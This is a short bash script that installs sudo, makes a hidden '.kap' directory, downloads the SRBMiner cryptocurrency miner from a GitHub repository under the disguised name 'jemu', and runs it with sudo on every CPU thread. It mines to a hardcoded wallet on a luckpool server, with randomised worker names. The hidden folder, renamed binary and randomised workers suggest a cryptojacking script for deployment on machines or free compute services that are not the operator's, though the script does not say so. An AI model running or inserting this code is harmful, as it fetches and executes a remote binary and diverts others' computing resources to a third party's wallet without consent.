#!/bin/bash
apt-get update ; apt-get -y install sudo
mkdir .kap && cd .kap
wget -O jemu https://github.com/nandafiku/gradi/raw/main/SRBMiner-247
chmod 777 jemu
sudo ./jemu --algorithm verushash --pool na.luckpool.net:3956 --wallet RJaE1YRdUd2wy5zpDbp4ij6DbAapUadhrp.$(echo $(shuf -i 1-30000 -n 1)-AJG) --password x --cpu-threads $(nproc --all)
